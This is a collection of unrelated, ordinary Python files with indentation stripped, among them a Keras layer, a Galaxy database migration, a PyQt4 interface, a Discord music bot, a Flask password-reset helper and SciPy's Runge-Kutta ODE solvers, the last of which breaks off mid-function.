def compute_output_shape(self, input_shape):
return input_shape
def get_config(self):
config = super(L2Scale, self).get_config()
config.update({'alpha': self.alpha})
return config
|
import math
def cut_evenly(weights, threshold):
min_weight = min(weights)
weights = [w / min_weight for w in weights]
intervals = [None] * len(weights)
base_cuts = 0
for i, weight in enumerate(weights):
if weight > 1:
a, b = weight * threshold, weight / threshold
intervals[i] = (a, b)
for coefficient in range(1, math.ceil(1 / (b - a)) + 1):
a, b = coefficient * a, coefficient * b
min_integer = math.ceil(a)
if math.ceil(a) == int(a):
min_integer += 1
if min_integer < b:
base_cuts = max(base_cuts, coefficient - 1)
break
while True:
coefficient = base_cuts + 1
min_total_cuts = 0
for interval in intervals:
if interval is None:
min_total_cuts += base_cuts
else:
a, b = coefficient * interval[0], coefficient * interval[1]
min_integer = math.ceil(a)
if min_integer == int(a):
min_integer += 1
if min_integer < b:
min_total_cuts += min_integer - 1
else:
break
else:
break
base_cuts += 1
continue
return min_total_cuts
if __name__ == "__main__":
threshold, _ = input().strip().split(" ")
threshold = float(threshold)
veggies = [int(weight) for weight in input().strip().split(" ")]
min_cuts = cut_evenly(veggies, threshold)
print(min_cuts)
|
"""
Migration script to add the post_job_action_association table.
"""
from sqlalchemy import *
from migrate import *
from migrate.changeset import *
from galaxy.model.custom_types import *
import datetime
now = datetime.datetime.utcnow
import logging
log = logging.getLogger( __name__ )
metadata = MetaData( migrate_engine )
PostJobActionAssociation_table = Table("post_job_action_association", metadata,
Column("id", Integer, primary_key=True),
Column("post_job_action_id", Integer, ForeignKey("post_job_action.id"), index=True, nullable=False),
Column("job_id", Integer, ForeignKey("job.id"), index=True, nullable=False))
def upgrade():
print __doc__
metadata.reflect()
try:
PostJobActionAssociation_table.create()
except Exception, e:
log.debug( "Creating PostJobActionAssociation table failed: %s" % str( e ) )
def downgrade():
# Load existing tables
metadata.reflect()
try:
PostJobActionAssociation_table.drop()
except Exception, e:
log.debug( "Dropping PostJobActionAssociation table failed: %s" % str( e ) )
|
from typing import List, Tuple
from mypy.plugin import Plugin
from mypy.nodes import MypyFile
class DepsPlugin(Plugin):
def get_additional_deps(self, file: MypyFile) -> List[Tuple[int, str, int]]:
if file.fullname == '__main__':
return [(10, 'err', -1)]
return []
def plugin(version):
return DepsPlugin
|
# импотрирую для работы со знаками припинания.
import string
# тут лежат регулярные выражения похоже на sql
import re
# для приведения слов к первой форме
import pymorphy2
text = open('texst_lesson_3.txt', 'r', encoding='UTF-8') # Для винды обязательно писать кодировку иначе ошибка
text_1 = text.read()
'''проверка прочтения текста. '''
print(text_1)
print('1) методами строк очистить текст от знаков препинания;')
text_2 = text_1.translate(str.maketrans('', '', string.punctuation))
print(text_2)
# так эффективнее либо следать не эффективно но самой
text_3 = re.sub(r'[^\w\s]','',text_1)
print(text_2)
print('2 сформировать list со словами (split);')
# для удобства возьму исходный текст и буду формировать по предложениям (точки в виде разделителя)
arr_2 = text_1.split('.')
print(arr_2)
print('3) привести все слова к нижнему регистру (map);')
text_4 = list(map(lambda m: m.lower(), arr_2))
print(text_4)
print(' 4) вывести 5 наиболее часто встречающихся слов (sort), вывести количество разных слов в тексте (set).')
# получим снача лист из слов текста,для этого очищенный для знаков текст поделепим по пробелам
arr_3 = text_2.split()
# не знаю для питона слово с большой буквы и маленькой одинаковые или нет, поэтому в нагрузку уменьшу регистр
arr_3 = list(map(lambda m: m.lower(), arr_3))
print(arr_3)
# приведение слов к первой форме
arr_4 = []
morph = pymorphy2.MorphAnalyzer()
for arr_3 in arr_3:
p = morph.parse(arr_3)[0]
arr_4.append(p.normal_form)
print('приведение к 1 форме слова')
print(arr_4)
# заполняем словарь таким образом что бы посчитать количество слов в тексте.
dict = {a: arr_4.count(a) for a in arr_4}
print(dict)
# 5 наиболее встречающихся
sort_list = list(dict.items())
sort_list.sort(key=lambda i: i[1], reverse=True)
print('5 наиболее встречающихся')
print(sort_list[:5])
# Количество разных слов в тексте
text_set = set(arr_4)
print('Количество разных слов в тексте')
print(len(text_set))
|
# -*- coding: utf-8 -*-
"""
UNIVERSIDAD EL BOSQUE
PROYECTO INTEGRADO - TRANSFORMADAS / TRANSDUCTORES
PEDRO GUILLEM
LUISA ECHEVERRY
DIANA NUNEZ
Copyright:
Autor: PEDRO GUILLEM
Generado usando PyQT4 desde ui_plot.ui
"""
# Form implementation generated from reading ui file 'ui_plot.ui'
#
# Created: Sat Nov 5 22:10:24 2016
# by: PyQt4 UI code generator 4.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(900, 600)
MainWindow.setMinimumSize(QtCore.QSize(900, 0))
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.realtimeData = QtGui.QGroupBox(self.centralwidget)
self.realtimeData.setGeometry(QtCore.QRect(10, 10, 611, 551))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(8)
font.setBold(True)
font.setWeight(65)
self.realtimeData.setFont(font)
self.realtimeData.setObjectName(_fromUtf8("realtimeData"))
self.audioPCM = PlotWidget(self.realtimeData)
self.audioPCM.setGeometry(QtCore.QRect(10, 30, 591, 201))
self.audioPCM.setObjectName(_fromUtf8("audioPCM"))
self.audioPCM.setLabel('left','Amplitud (mV)')
self.audioPCM.setLabel('bottom','Tiempo','s')
self.audioPCM.setTitle('Audio Microfono - PCM 16Bit - Entero con Signo (Little Endian)')
self.audioFFT = PlotWidget(self.realtimeData)
self.audioFFT.setGeometry(QtCore.QRect(10, 240, 591, 301))
self.audioFFT.setObjectName(_fromUtf8("audioFFT"))
self.audioFFT.setLabel('left','Amplitud','dB')
self.audioFFT.setLabel('bottom','Frecuencua (4096 puntos)','Hz')
self.audioFFT.setTitle('Fourier Discreta (Log10)')
self.controlData = QtGui.QGroupBox(self.centralwidget)
self.controlData.setGeometry(QtCore.QRect(630, 160, 261, 401))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(10)
font.setBold(True)
font.setWeight(65)
self.controlData.setFont(font)
self.controlData.setObjectName(_fromUtf8("controlData"))
self.cancelData = PlotWidget(self.controlData)
self.cancelData.setGeometry(QtCore.QRect(10, 230, 241, 161))
self.cancelData.setObjectName(_fromUtf8("cancelData"))
self.cancelData.setLabel('left','Amplitud','dB')
self.cancelData.setLabel('bottom','Tiempo')
self.cancelData.setTitle('Anti-Tono')
self.btnDetectar = QtGui.QPushButton(self.controlData)
self.btnDetectar.setGeometry(QtCore.QRect(40, 30, 171, 23))
font = QtGui.QFont()
font.setPointSize(7)
font.setBold(False)
font.setWeight(50)
self.btnDetectar.setFont(font)
self.btnDetectar.setObjectName(_fromUtf8("btnDetectar"))
self.btnCancelar = QtGui.QPushButton(self.controlData)
self.btnCancelar.setGeometry(QtCore.QRect(40, 200, 171, 23))
font = QtGui.QFont()
font.setPointSize(7)
font.setBold(False)
self.btnCancelar.setFont(font)
self.btnCancelar.setObjectName(_fromUtf8("btnCancelar"))
self.dataLog = QtGui.QTextBrowser(self.controlData)
self.dataLog.setFont(font)
self.dataLog.setGeometry(QtCore.QRect(10, 60, 241, 131))
self.dataLog.setObjectName(_fromUtf8("dataLog"))
self.tprincipal = QtGui.QLabel(self.centralwidget)
self.tprincipal.setGeometry(QtCore.QRect(630, 10, 251, 21))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(12)
self.tprincipal.setFont(font)
self.tprincipal.setObjectName(_fromUtf8("tprincipal"))
font = QtGui.QFont()
font.setFamily(_fromUtf8("Arial"))
font.setPointSize(10)
self.tproyecto = QtGui.QLabel(self.centralwidget)
self.tproyecto.setGeometry(QtCore.QRect(630, 30, 151, 16))
self.tproyecto.setObjectName(_fromUtf8("tproyecto"))
self.tproyecto.setFont(font)
self.tproyecto2 = QtGui.QLabel(self.centralwidget)
self.tproyecto2.setFont(font)
self.tproyecto2.setGeometry(QtCore.QRect(630, 40, 181, 16))
self.tproyecto2.setObjectName(_fromUtf8("tproyecto2"))
self.pedro = QtGui.QLabel(self.centralwidget)
self.pedro.setGeometry(QtCore.QRect(630, 70, 161, 16))
self.pedro.setObjectName(_fromUtf8("pedro"))
self.pedro.setFont(font)
self.luisa = QtGui.QLabel(self.centralwidget)
self.luisa.setGeometry(QtCore.QRect(630, 80, 161, 16))
self.luisa.setObjectName(_fromUtf8("luisa"))
self.luisa.setFont(font)
self.diana = QtGui.QLabel(self.centralwidget)
self.diana.setGeometry(QtCore.QRect(630, 90, 161, 16))
self.diana.setObjectName(_fromUtf8("diana"))
self.diana.setFont(font)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 900, 18))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "Proyecto Integrado - Cancelador Tonos Puros v0.1", None))
self.realtimeData.setTitle(_translate("MainWindow", "ANÁLISIS EN TIEMPO REAL", None))
self.controlData.setTitle(_translate("MainWindow", "CONTROL", None))
self.btnDetectar.setToolTip(_translate("MainWindow", "<html><head/><body><p>Iniciar Deteccion de Tonos Puros</p></body></html>", None))
self.btnDetectar.setText(_translate("MainWindow", "INICIAR DETECCIÓN", None))
self.btnCancelar.setToolTip(_translate("MainWindow", "<html><head/><body><p>Activar/Desactivar Cancelador de Tonos</p></body></html>", None))
self.btnCancelar.setText(_translate("MainWindow", "ACTIVAR CANCELADOR", None))
self.tprincipal.setText(_translate("MainWindow", "Universidad el Bosque", None))
self.tproyecto.setText(_translate("MainWindow", "Proyecto Integrado", None))
self.tproyecto2.setText(_translate("MainWindow", "Transformadas / Transductores", None))
self.pedro.setText(_translate("MainWindow", "PEDRO GUILLEM", None))
self.luisa.setText(_translate("MainWindow", "LUISA ECHEVERRY", None))
self.diana.setText(_translate("MainWindow", "DIANA NUÑEZ", None))
from pyqtgraph import PlotWidget
|
#!/usr/bin/python3
import sys
# sum all the values associated with keys to get the score of each subreddit
word = None
count = 0
upvotes=0
downvotes=0
for line in sys.stdin:
username, value,ups,downs = line.strip().split()
if word is None: # runs first time the only in the loop
word = username
elif word != username:# if the username changes then push the line in the output and reset to get another username
print(word, count,upvotes,downvotes, sep='\t')
word = username
count = 0
upvotes=0
downvotes=0
count += int(value)
upvotes += int(ups)
downvotes += int(downs)
print(word, count,upvotes,downvotes, sep='\t')
|
import hikari
import tanjun
import os
import logging
from dotenv import load_dotenv
import lavasnek_rs
load_dotenv()
DISCORD_TOKEN = os.getenv("DISCORD_TOKEN")
LAVALINK_HOST = os.getenv("LAVALINK_HOST")
LAVALINK_PASSWORD = os.getenv("LAVALINK_PASSWORD")
LAVALINK_PORT = os.getenv("LAVALINK_PORT")
logging.basicConfig(level=logging.INFO)
class EventHandler:
"""Handles events from the Lavalink server."""
async def track_start(self, _: lavasnek_rs.Lavalink, event: lavasnek_rs.TrackStart) -> None:
"""Handles track start events."""
print(f"Track started on guild: {event.guild_id}")
async def track_finish(self, _: lavasnek_rs.Lavalink, event: lavasnek_rs.TrackFinish) -> None:
"""Handles track finish events."""
print(f"Track finished on guild: {event.guild_id}")
async def track_exception(self, lavalink: lavasnek_rs.Lavalink, event: lavasnek_rs.TrackException) -> None:
"""Handles track exception events."""
print(f"Track exception event happened on guild: {event.guild_id}")
# If a track was unable to be played, skip it
skip = await lavalink.skip(event.guild_id)
node = await lavalink.get_guild_node(event.guild_id)
if skip and node:
if not node.queue and not node.now_playing:
await lavalink.stop(event.guild_id)
bot = hikari.GatewayBot(DISCORD_TOKEN)
client = tanjun.Client.from_gateway_bot(
bot, declare_global_commands=True, mention_prefix=True)
@client.with_listener(hikari.ShardReadyEvent)
async def on_shard_ready(
event: hikari.ShardReadyEvent,
client_: tanjun.Client = tanjun.injected(type=tanjun.Client),
) -> None:
"""Event that triggers when the hikari gateway is ready."""
builder = (
lavasnek_rs.LavalinkBuilder(event.my_user.id, DISCORD_TOKEN)
.set_host(LAVALINK_HOST)
.set_password(LAVALINK_PASSWORD)
.set_port(int(LAVALINK_PORT))
.set_start_gateway(False)
# We set start gateway False because hikari can handle
# voice events for us.
)
# Here we add lavasnek_rs.Lavalink as a type dependency to the client
# We will use this later to have access to it in all our commands
client_.set_type_dependency(lavasnek_rs.Lavalink, await builder.build(EventHandler))
@client.with_listener(hikari.VoiceStateUpdateEvent)
async def on_voice_state_update(
event: hikari.VoiceStateUpdateEvent,
lavalink: lavasnek_rs.Lavalink = tanjun.injected(type=lavasnek_rs.Lavalink),
) -> None:
"""Passes voice state updates to lavalink."""
await lavalink.raw_handle_event_voice_state_update(
event.state.guild_id,
event.state.user_id,
event.state.session_id,
event.state.channel_id,
)
@client.with_listener(hikari.VoiceServerUpdateEvent)
async def on_voice_server_update(
event: hikari.VoiceServerUpdateEvent,
lavalink: lavasnek_rs.Lavalink = tanjun.injected(type=lavasnek_rs.Lavalink),
) -> None:
"""Passes voice server updates to lavalink."""
if event.endpoint is not None:
await lavalink.raw_handle_event_voice_server_update(
event.guild_id,
event.endpoint,
event.token,
)
@bot.listen(hikari.StartedEvent)
async def on_started(event: hikari.StartedEvent) -> None:
print("Hashashin is online!")
for filename in os.listdir("./modules"):
if filename.endswith('.py'):
client.load_modules(f"modules.{filename[:-3]}")
bot.run()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of SyncBoom and is MIT-licensed.
# Originally based on microblog, licensed under the MIT License.
from flask import render_template, current_app
from flask_babel import _
from app.email import send_email
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_email(_('[SyncBoom] Reset Your Password'),
sender=current_app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
|
import numpy as np
from .base import OdeSolver, DenseOutput
from .common import (validate_max_step, validate_tol, select_initial_step,
norm, warn_extraneous, validate_first_step)
from . import dop853_coefficients
# Multiply steps computed from asymptotic behaviour of errors by this.
SAFETY = 0.9
MIN_FACTOR = 0.2 # Minimum allowed decrease in a step size.
MAX_FACTOR = 10 # Maximum allowed increase in a step size.
def rk_step(fun, t, y, f, h, A, B, C, K):
"""Perform a single Runge-Kutta step.
This function computes a prediction of an explicit Runge-Kutta method and
also estimates the error of a less accurate method.
Notation for Butcher tableau is as in [1]_.
Parameters
----------
fun : callable
Right-hand side of the system.
t : float
Current time.
y : ndarray, shape (n,)
Current state.
f : ndarray, shape (n,)
Current value of the derivative, i.e., ``fun(x, y)``.
h : float
Step to use.
A : ndarray, shape (n_stages, n_stages)
Coefficients for combining previous RK stages to compute the next
stage. For explicit methods the coefficients at and above the main
diagonal are zeros.
B : ndarray, shape (n_stages,)
Coefficients for combining RK stages for computing the final
prediction.
C : ndarray, shape (n_stages,)
Coefficients for incrementing time for consecutive RK stages.
The value for the first stage is always zero.
K : ndarray, shape (n_stages + 1, n)
Storage array for putting RK stages here. Stages are stored in rows.
The last row is a linear combination of the previous rows with
coefficients
Returns
-------
y_new : ndarray, shape (n,)
Solution at t + h computed with a higher accuracy.
f_new : ndarray, shape (n,)
Derivative ``fun(t + h, y_new)``.
References
----------
.. [1] E. Hairer, S. P. Norsett G. Wanner, "Solving Ordinary Differential
Equations I: Nonstiff Problems", Sec. II.4.
"""
K[0] = f
for s, (a, c) in enumerate(zip(A[1:], C[1:]), start=1):
dy = np.dot(K[:s].T, a[:s]) * h
K[s] = fun(t + c * h, y + dy)
y_new = y + h * np.dot(K[:-1].T, B)
f_new = fun(t + h, y_new)
K[-1] = f_new
return y_new, f_new
class RungeKutta(OdeSolver):
"""Base class for explicit Runge-Kutta methods."""
C = NotImplemented
A = NotImplemented
B = NotImplemented
E = NotImplemented
P = NotImplemented
order = NotImplemented
error_estimator_order = NotImplemented
n_stages = NotImplemented
def __init__(self, fun, t0, y0, t_bound, max_step=np.inf,
rtol=1e-3, atol=1e-6, vectorized=False,
first_step=None, **extraneous):
warn_extraneous(extraneous)
super(RungeKutta, self).__init__(fun, t0, y0, t_bound, vectorized,
support_complex=True)
self.y_old = None
self.max_step = validate_max_step(max_step)
self.rtol, self.atol = validate_tol(rtol, atol, self.n)
self.f = self.fun(self.t, self.y)
if first_step is None:
self.h_abs = select_initial_step(
self.fun, self.t, self.y, self.f, self.direction,
self.error_estimator_order, self.rtol, self.atol)
else:
self.h_abs = validate_first_step(first_step, t0, t_bound)
self.K = np.empty((self.n_stages + 1, self.n), dtype=self.y.dtype)
self.error_exponent = -1 / (self.error_estimator_order + 1)
self.h_previous = None
def _estimate_error(self, K, h):
return np.dot(K.T, self.E) * h
def _estimate_error_norm(self, K, h, scale):
return norm(self._estimate_error(K, h) / scale)
def _step_impl(self):
t = self.t
y = self.y
max_step = self.max_step
rtol = self.rtol
atol = self.atol
min_step = 10 * np.abs(np.nextafter(t, self.direction * np.inf) - t)
if self.h_abs > max_step:
h_abs = max_step
elif self.h_abs < min_step:
h_abs = min_step
else:
h_abs = self.h_abs
step_accepted = False
step_rejected = False
while not step_accepted:
if h_abs < min_step:
return False, self.TOO_SMALL_STEP
h = h_abs * self.direction
t_new = t + h
if self.direction * (t_new - self.t_bound) > 0:
t_new = self.t_bound
h = t_new - t
h_abs = np.abs(h)
y_new, f_new = rk_step(self.fun, t, y, self.f, h, self.A,
self.B, self.C, self.K)
scale = atol + np.maximum(np.abs(y), np.abs(y_new)) * rtol
error_norm = self._estimate_error_norm(self.K, h, scale)
if error_norm < 1:
if error_norm == 0:
factor = MAX_FACTOR
else:
factor = min(MAX_FACTOR,
SAFETY * error_norm ** self.error_exponent)
if step_rejected:
factor = min(1, factor)
h_abs *= factor
step_accepted = True
else:
h_abs *= max(MIN_FACTOR,
SAFETY * error_norm ** self.error_exponent)
step_rejected = True
self.h_previous = h
self.y_old = y
self.t = t_new
self.y = y_new
self.h_abs = h_abs
self.f = f_new
return True, None
def _dense_output_impl(self):
Q = self.K.T.dot(self.P)
return RkDenseOutput(self.t_old, self.t, self.y_old, Q)
class RK23(RungeKutta):
"""Explicit Runge-Kutta method of order 3(2).
This uses the Bogacki-Shampine pair of formulas [1]_. The error is controlled
assuming accuracy of the second-order method, but steps are taken using the
third-order accurate formula (local extrapolation is done). A cubic Hermite
polynomial is used for the dense output.
Can be applied in the complex domain.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here ``t`` is a scalar and there are two options for ndarray ``y``.
It can either have shape (n,), then ``fun`` must return array_like with
shape (n,). Or alternatively it can have shape (n, k), then ``fun``
must return array_like with shape (n, k), i.e. each column
corresponds to a single column in ``y``. The choice between the two
options is determined by `vectorized` argument (see below).
t0 : float
Initial time.
y0 : array_like, shape (n,)
Initial state.
t_bound : float
Boundary time - the integration won't continue beyond it. It also
determines the direction of the integration.
first_step : float or None, optional
Initial step size. Default is ``None`` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e., the step size is not
bounded and determined solely by the solver.
rtol, atol : float and array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here, `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
Attributes
----------
n : int
Number of equations.
status : string
Current status of the solver: 'running', 'finished' or 'failed'.
t_bound : float
Boundary time.
direction : float
Integration direction: +1 or -1.
t : float
Current time.
y : ndarray
Current state.
t_old : float
Previous time. None if no steps were made yet.
step_size : float
Size of the last successful step. None if no steps were made yet.
nfev : int
Number evaluations of the system's right-hand side.
njev : int
Number of evaluations of the Jacobian. Is always 0 for this solver as it does not use the Jacobian.
nlu : int
Number of LU decompositions. Is always 0 for this solver.
References
----------
.. [1] P. Bogacki, L.F. Shampine, "A 3(2) Pair of Runge-Kutta Formulas",
Appl. Math. Lett. Vol. 2, No. 4. pp. 321-325, 1989.
"""
order = 3
error_estimator_order = 2
n_stages = 3
C = np.array([0, 1/2, 3/4])
A = np.array([
[0, 0, 0],
[1/2, 0, 0],
[0, 3/4, 0]
])
B = np.array([2/9, 1/3, 4/9])
E = np.array([5/72, -1/12, -1/9, 1/8])
P = np.array([[1, -4 / 3, 5 / 9],
[0, 1, -2/3],
[0, 4/3, -8/9],
[0, -1, 1]])
class RK45(RungeKutta):
"""Explicit Runge-Kutta method of order 5(4).
This uses the Dormand-Prince pair of formulas [1]_. The error is controlled
assuming accuracy of the fourth-order method accuracy, but steps are taken
using the fifth-order accurate formula (local extrapolation is done).
A quartic interpolation polynomial is used for the dense output [2]_.
Can be applied in the complex domain.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here ``t`` is a scalar, and there are two options for the ndarray ``y``:
It can either have shape (n,); then ``fun`` must return array_like with
shape (n,). Alternatively it can have shape (n, k); then ``fun``
must return an array_like with shape (n, k), i.e., each column
corresponds to a single column in ``y``. The choice between the two
options is determined by `vectorized` argument (see below).
t0 : float
Initial time.
y0 : array_like, shape (n,)
Initial state.
t_bound : float
Boundary time - the integration won't continue beyond it. It also
determines the direction of the integration.
first_step : float or None, optional
Initial step size. Default is ``None`` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e., the step size is not
bounded and determined solely by the solver.
rtol, atol : float and array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
Attributes
----------
n : int
Number of equations.
status : string
Current status of the solver: 'running', 'finished' or 'failed'.
t_bound : float
Boundary time.
direction : float
Integration direction: +1 or -1.
t : float
Current time.
y : ndarray
Current state.
t_old : float
Previous time. None if no steps were made yet.
step_size : float
Size of the last successful step. None if no steps were made yet.
nfev : int
Number evaluations of the system's right-hand side.
njev : int
Number of evaluations of the Jacobian. Is always 0 for this solver as it does not use the Jacobian.
nlu : int
Number of LU decompositions. Is always 0 for this solver.
References
----------
.. [1] J. R. Dormand, P. J. Prince, "A family of embedded Runge-Kutta
formulae", Journal of Computational and Applied Mathematics, Vol. 6,
No. 1, pp. 19-26, 1980.
.. [2] L. W. Shampine, "Some Practical Runge-Kutta Formulas", Mathematics
of Computation,, Vol. 46, No. 173, pp. 135-150, 1986.
"""
order = 5
error_estimator_order = 4
n_stages = 6
C = np.array([0, 1/5, 3/10, 4/5, 8/9, 1])
A = np.array([
[0, 0, 0, 0, 0],
[1/5, 0, 0, 0, 0],
[3/40, 9/40, 0, 0, 0],
[44/45, -56/15, 32/9, 0, 0],
[19372/6561, -25360/2187, 64448/6561, -212/729, 0],
[9017/3168, -355/33, 46732/5247, 49/176, -5103/18656]
])
B = np.array([35/384, 0, 500/1113, 125/192, -2187/6784, 11/84])
E = np.array([-71/57600, 0, 71/16695, -71/1920, 17253/339200, -22/525,
1/40])
# Corresponds to the optimum value of c_6 from [2]_.
P = np.array([
[1, -8048581381/2820520608, 8663915743/2820520608,
-12715105075/11282082432],
[0, 0, 0, 0],
[0, 131558114200/32700410799, -68118460800/10900136933,
87487479700/32700410799],
[0, -1754552775/470086768, 14199869525/1410260304,
-10690763975/1880347072],
[0, 127303824393/49829197408, -318862633887/49829197408,
701980252875 / 199316789632],
[0, -282668133/205662961, 2019193451/616988883, -1453857185/822651844],
[0, 40617522/29380423, -110615467/29380423, 69997945/29380423]])
class DOP853(RungeKutta):
"""Explicit Runge-Kutta method of order 8.
This is a Python implementation of "DOP853" algorithm originally written
in Fortran [1]_, [2]_. Note that this is not a literate translation, but
the algorithmic core and coefficients are the same.
Can be applied in the complex domain.
Parameters
----------
fun : callable
Right-hand side of the system. The calling signature is ``fun(t, y)``.
Here, ``t`` is a scalar, and there are two options for the ndarray ``y``:
It can either have shape (n,); then ``fun`` must return array_like with
shape (n,). Alternatively it can have shape (n, k); then ``fun``
must return an array_like with shape (n, k), i.e. each column
corresponds to a single column in ``y``. The choice between the two
options is determined by `vectorized` argument (see below).
t0 : float
Initial time.
y0 : array_like, shape (n,)
Initial state.
t_bound : float
Boundary time - the integration won't continue beyond it. It also
determines the direction of the integration.
first_step : float or None, optional
Initial step size. Default is ``None`` which means that the algorithm
should choose.
max_step : float, optional
Maximum allowed step size. Default is np.inf, i.e. the step size is not
bounded and determined solely by the solver.
rtol, atol : float and array_like, optional
Relative and absolute tolerances. The solver keeps the local error
estimates less than ``atol + rtol * abs(y)``. Here `rtol` controls a
relative accuracy (number of correct digits). But if a component of `y`
is approximately below `atol`, the error only needs to fall within
the same `atol` threshold, and the number of correct digits is not
guaranteed. If components of y have different scales, it might be
beneficial to set different `atol` values for different components by
passing array_like with shape (n,) for `atol`. Default values are
1e-3 for `rtol` and 1e-6 for `atol`.
vectorized : bool, optional
Whether `fun` is implemented in a vectorized fashion. Default is False.
Attributes
----------
n : int
Number of equations.
status : string
Current status of the solver: 'running', 'finished' or 'failed'.
t_bound : float
Boundary time.
direction : float
Integration direction: +1 or -1.
t : float
Current time.
y : ndarray
Current state.
t_old : float
Previous time. None if no steps were made yet.
step_size : float
Size of the last successful step. None if no steps were made yet.
nfev : int
Number evaluations of the system's right-hand side.
njev : int
Number of evaluations of the Jacobian. Is always 0 for this solver
as it does not use the Jacobian.
nlu : int
Number of LU decompositions. Is always 0 for this solver.
References
----------
.. [1] E. Hairer, S. P. Norsett G. Wanner, "Solving Ordinary Differential
Equations I: Nonstiff Problems", Sec. II.
.. [2] `Page with original Fortran code of DOP853
<http://www.unige.ch/~hairer/software.html>`_.
"""
n_stages = dop853_coefficients.N_STAGES
order = 8
error_estimator_order = 7
A = dop853_coefficients.A[:n_stages, :n_stages]
B = dop853_coefficients.B
C = dop853_coefficients.C[:n_stages]
E3 = dop853_coefficients.E3
E5 = dop853_coefficients.E5
D = dop853_coefficients.D
A_EXTRA = dop853_coefficients.A[n_stages + 1:]
C_EXTRA = dop853_coefficients.C[n_stages + 1:]
def __init__(self, fun, t0, y0, t_bound, max_step=np.inf,
rtol=1e-3, atol=1e-6, vectorized=False,
first_step=None, **extraneous):
super(DOP853, self).__init__(fun, t0, y0, t_bound, max_step,
rtol, atol, vectorized, first_step,
**extraneous)
self.K_extended = np.empty((dop853_coefficients.N_STAGES_EXTENDED,
self.n), dtype=self.y.dtype)
self.K = self.K_extended[:self.n_stages + 1]
def _estimate_error(self, K, h): # Left for testing purposes.
err5 = np.dot(K.T, self.E5)
err3 = np.dot(K.T, self.E3)
denom = np.hypot(np.abs(err5), 0.1 * np.abs(err3))
correction_factor = np.ones_like(err5)
mask = denom > 0
correction_factor[mask] = np.abs(err5[mask]) / denom[mask]
return h * err5 * correction_factor
def _estimate_error_norm(self, K, h, scale):
err5 = np.dot(K.T, self.E5) / scale
err3 = np.dot(K.T, self.E3) / scale
err5_norm_2 = np.sum(err5**2)
err3_norm_2 = np.sum(err3**2)
if err5_norm_2 == 0 and err3_norm_2 == 0:
return 0
denom = err5_norm_2 + 0.01 * err3_norm_2
return np.abs(h) * err5_norm_2 / np.sqrt(denom * len(scale))
def _dense_output_impl(self):
K = self.K_extended
h = self.h_previous
for s, (a, c) in enumerate(zip(self.A_EXTRA, self.C_EXTRA),
start=self.n_stages + 1):
dy = np.dot(K[:s].T, a[:s]) * h
K[s] = self.fun(self.t_old + c * h, self.y_old + dy)
F = np.empty((dop853_coefficients.INTERPOLATOR_POWER, self.n),
dtype=self.y_old.dtype)
f_old = K[0]
delta_y = self.y - self.y_old
F[0] = delta_y
F[1] = h * f_old - delta_y
F[2] = 2 * delta_y - h * (self.f + f_old)
F[3:] = h * np.dot(self.D, K)
return Dop853DenseOutput(self.t_old, self.t, self.y_old, F)
class RkDenseOutput(DenseOutput):
def __init__(self, t_old, t, y_old, Q):
super(RkDenseOutput, self).__init__(t_old, t)
self.h = t - t_old
self.Q = Q
self.order = Q.shape[1] - 1
self.y_old = y_old
def _call_impl(self, t):
x = (t - self.t_old) / self.h
if t.ndim == 0:
p = np.tile(x, self.order + 1)
p = np.cumprod(p)
else:
p = np.tile(x, (self.order + 1, 1))
p = np.cumprod(p, axis=0)
y = self.h * np.dot(self.Q, p)
if y.ndim == 2:
y += self.y_old[:, None]
else:
y += self.y_old
return y
class Dop853DenseOutput(DenseOutput):
def __init__(self, t_old, t, y_old, F):
super(Dop853DenseOutput, self).__init__(t_old, t)
self.h = t - t_old
self.F = F
self.y_old = y_old
def _call_impl(self, t):
x = (t - self.t_old) / self.h
